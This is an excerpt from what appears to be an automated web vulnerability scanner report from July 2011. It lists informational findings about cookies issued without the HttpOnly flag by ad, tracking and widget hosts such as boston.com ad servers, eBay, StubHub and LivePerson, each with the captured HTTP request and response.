Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.116. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5? HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; RMFD=011QK73VO205zQN|O105zfl

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:41:51 GMT
Server: Apache
Set-Cookie: RMFD=011QjH71; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 21371
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: application/x-javascript
Connection: Keep-Alive

function OAS_RICH(position) {
if (position == 'TOP') {
document.write ('<A HREF="http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonial
...[SNIP]...

14.117. http://rover.ebay.com/rover/1/711-53200-19255-0/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /rover/1/711-53200-19255-0/1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rover/1/711-53200-19255-0/1?type=2&campid=5336216552&customid=842112189&item=120749940240&ext=120749940240 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dp1=bu1p/QEBfX0BAX19AQA**4fe09dfb^; ns1=BAQAAATCQmOoWAAaAANgARk/gnftjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wPysh37l0/bD8OFYXWzauWH5+M/Q*; nonsession=CgADKACBXZWv7YWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTf9xgzLqukJm; npii=btrm/svid%3D943168581484fea87d0^tguid/adb7b0cb1300a0aa15432be3fe5c79844fea87d0^cguid/3666b2e01300a47a44d622a6ffc193724fea87d0^

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.ad2%60a1a-13143aeae95
Set-Cookie: npii=btpim/14e25d58a^tguid/adb7b0cb1300a0aa15432be3fe5c798450070202^cguid/3666b2e01300a47a44d622a6ffc1937250070202^trm/svid%3D9431685814850070202^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:35:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private
Pragma: no-cache
Location: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601616085&item=120749940240
Content-Length: 0
Date: Tue, 19 Jul 2011 18:35:46 GMT


14.118. http://rover.ebay.com/roverimp/0/0/14  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /roverimp/0/0/14

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roverimp/0/0/14?imp=2041647&lv=tz%3D-5%26lt%3D2011-07-19T18%253A39%253A19%253A494%26ref%3D%26ai%3D520%26res%3D1920x1200%26fla%3Dundefined%26slr%3D0%26scd%3D32%26ctb%3D26259&mpt=1311100759544 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ds2=asotr/b13qzzzzzLCz^; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702ba^cguid/3666b2e01300a47a44d622a6ffc19372500702ba^trm/svid%3D94316858148500702ba^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.ac3g%3C52-13143b1fa46
Set-Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702da^cguid/3666b2e01300a47a44d622a6ffc19372500702da^trm/svid%3D94316858148500702da^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:22 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: image/gif
Content-Length: 42
Date: Tue, 19 Jul 2011 18:39:22 GMT

GIF89a.............!.......,...........2.;

14.119. http://rover.ebay.com/roversync/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /roversync/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roversync/?site=0&stg=1&mpt=1311100723361 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ds2=asotr/b13qzzzzzLCz^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5E; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9un*ts67.adea746-13143b1f1e3
Set-Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702d8^cguid/3666b2e01300a47a44d622a6ffc19372500702d8^trm/svid%3D94316858148500702d8^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:20 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: image/gif
Content-Length: 42
Date: Tue, 19 Jul 2011 18:39:20 GMT

GIF89a.............!.......,...........2.;

14.120. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=7973594 HTTP/1.1
Host: rt.legolas-media.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: ui=e01db2f2-208a-43e5-beec-a78df4693afe; lgtix=NQABAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB; lgpr=//8=

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:08 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQADAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB; path=/; expires=Fri, 18 Jul 2014 20:44:08 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 0
Connection: close


14.121. http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.stubhubstatic.com
Path:   /resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js HTTP/1.1
Host: s.stubhubstatic.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:37 GMT
Server: Apache
Set-Cookie: TLTHID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com
Set-Cookie: TLTSID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com
Last-Modified: Wed, 29 Jun 2011 00:07:09 GMT
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Wed, 18 Jul 2012 18:35:37 GMT
Vary: Accept-Encoding
Content-Length: 73589
Content-Type: text/javascript

if(typeof TeaLeaf==="undefined"){TeaLeaf={};TeaLeaf.Private={};TeaLeaf.tlStartLoad=new Date();if(!TeaLeaf.Configuration){TeaLeaf.Configuration={tlversion:"2011.03.15.1",tlinit:false,tlSDK:false,tlSetG
...[SNIP]...

14.122. http://sales.liveperson.net/hc/21661174/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/21661174/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/21661174/?&visitor=16101514677756&msessionkey=5504769704751670663&site=21661174&cmd=mTagStartPage&lpCallId=745677900034-84418076789&protV=20&lpjson=1&page=http%3A//support.microsoft.com/contactus/&id=8564492554&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-NA.EN.CS.CON.PSTSLS.GENERAL&activePlugin=none&cobrowse=true&PV%21unit=NA.EN.CS.CON.PSTSLS.GENERAL&PV%21pageLoadTime=6%20sec&PV%21visitorActive=1&SV%21ExternalID=Chat1311088769136&SV%21langSelection=en-us&title=Help%20and%20Support&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQTRSRBT=BCEBMKKDBBGCPDLELDBDMCBE

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:19:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_21661174=STANDALONE; path=/hc/21661174
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Jul 2011 15:19:33 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"745677900034-84418076789","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

14.123. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seal-alaskaoregonwesternwashington.bbb.org
Path:   /logo/rbhzbus/realnetworks-43000165.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logo/rbhzbus/realnetworks-43000165.png HTTP/1.1
Host: seal-alaskaoregonwesternwashington.bbb.org
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:47 GMT
Server: Apache
P3P: CP="ALL DSP COR PSAa PSDa OUR NOR ONL UNI COM NAV"
Set-Cookie: logolink=43000165; path=/; domain=alaskaoregonwesternwashington.bbb.org
Set-Cookie: logolink=43000165; path=/; domain=bbb.org
Content-Disposition: inline; filename="seal-for-43000165.png"
Expires: Wed, 20 Jul 2011 03:42:51 GMT
Last-Modified: Tue, 19 Jul 2011 15:42:51 GMT
Etag: 3603dc914d773028caa686e571a980bf
Content-Type: image/png
Content-Length: 8316

.PNG
.
...IHDR.......&........l.. .IDATx...y|T......Y3.C.I......&;........W......._.*..Zw.b-H]...Pd.A.a.....M........L.....b...^...{...'s..9.Y.. L......GH..$..i...8I.......~.
..V.`8.'...Z...]..1x..
...[SNIP]...

14.124. http://sitelife.boston.com/ver1.0/Direct/Jsonp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.boston.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22b12c8144-b20e-11e0-aa83-a59fd6e1b552%22%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 838
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Tue, 19 Jul 2011 20:43:58 GMT

RequestBatch.callbacks.daapiCallback0({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/19/2011 04:42:04:603 PM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"b12c8144-b20e-11e0-aa83-a
...[SNIP]...

14.125. http://sitelife.boston.com/ver1.0/Stats/Tracker.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.boston.com
Path:   /ver1.0/Stats/Tracker.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&plckUserId=null&plckGcid=daapiCall&plckCurrentTime=1311108242646 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-2; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Business%20%7C%20Blog%20%7C%20Business%20Ticker%20Weblog%20%7C%20State%20Street%20announces%20more%20job%20cuts%20; s_sq=%5B%5BB%5D%5D; s_ppv=0; SiteLifeHost=l3vm104l3pluckcom

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Tue, 19 Jul 2011 20:44:37 GMT


14.126. http://srx.main.ebayrtm.com/rtm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srx.main.ebayrtm.com
Path:   /rtm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtm?RtmCmd&a=json&p=699:1595:973:974:825:827:829:813:283:280:433:876:912:1650:1651&ph=0:0:0:0:0:0:0:0:0:0:0:0:0:0:0&ev=0:0:0:0:0:0:0:0:0:1:0:0:0:0:0&g=adb7b0cb1300a0aa15432be3fe5c7984&uf=0&c=1H4sIAAAAAAAAAFVU32vbMBB%2BL%2FR%2FMGxPQ011OkmWAnoobQctNA1N1m0QMG6itqaNHWxnWSB%2F%2FE6Sl25Pd9%2F9%2BHT%2BTvKn%2BdZnt9v3DGwGMEY1Fia7m80zwQFOTzbC5o4Hy8FFzLn7JjLUPJs32zYT2bxavvm%2Byzq%2FRKmyid9lt77t%2FD777leBev%2FBpRxYNFyaSIngnqr6ZfRc1l1dbkbLZk1hQONAgxDRzx0gV8G11oHgubRWciF5zGKcCVA4xUcplMYELeLYYOWRQA8pC27my66p%2F47O2Mwv%2B6qpGX0Am2zXT77NmudjWrC7pu5fWfgWdv3L13022z71%2B41nD83y7XzabM4v3nvf1qMhPQ%2B5y6Ze%2Bpb6H31NIs%2F6svfn07b5VVGcfeg05C%2BrntjLrs8etv2rb5%2BbdsV%2B%2BrJlQT52Ve7JoQN3jFBqmZTrRHTny1Wzey%2FrVRfOWVXboCSa3LXrt%2FvyovtyerKsViTgYss50fFk1f8wqCNsUknlztqRtTEmj50xhUlbg05i3ASCoepUbMSwlGgQ8gTTPhB0gnBkR5Du682P66ti%2BnBzeR0jOBQTFQGRGzCaTg%2BXBpSjO8jTugVVfiZVIo6BXMVWyYerkRs3rDHNP%2Bzn31Aok9LF4an9ePckuGCRGycj5gOmmsVYkSqmOCPpxsAl58UZklcAF3oxFgWAJot5CMjFWHJyOLVZsjoPPYVQCqlHSgNQWC2USUAUEnMRedHayKuxEKgCozTK5DEWvJQlIg3k0XBmGBHd%2FcbXi6hBUhzp4U7LF%2F9Y%2Bd1N79cT%2F7sPgjkj0%2Fs2wzv%2F2Ds%2FaiG0daS1YsAkMGFRMuTCMG2ZHrCyTMXS%2BE6VgvxgDVdGHuj6WmPNAZUAjfYguVZc5JE2H34q6XYIlM7EuA74DxaR6JCcBAAA&ord=1311100529004&e=USC:1&z=10&bw=1065&bh=723&cg=3666b2e01300a47a44d622a6ffc19372&enc=UTF-8&v=4&rnc=1&cb=vjo.dsf.assembly.VjClientAssembler._callback0&_vrdm=1311100538345 HTTP/1.1
Host: srx.main.ebayrtm.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

